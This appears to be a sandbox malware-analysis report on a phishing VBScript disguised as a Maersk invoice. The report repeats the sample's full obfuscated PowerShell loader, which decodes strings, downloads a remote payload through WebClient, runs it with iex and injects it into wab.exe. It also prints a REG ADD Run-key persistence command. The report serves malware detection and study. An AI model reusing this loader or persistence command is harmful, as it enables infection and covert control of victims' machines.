ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_05445C17 Sleep,NtProtectVirtualMemory,

10_2_05445C17

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88C2B2	1_2_00007FFD9B88C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88B506	1_2_00007FFD9B88B506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454F1F0	4_2_0454F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454FAC0	4_2_0454FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EEA8	4_2_0454EEA8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Maersk_BL_Invoice_Packinglist.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"

Yara signature match

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@17/10@4/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Scabrosely.Tor

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6540

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
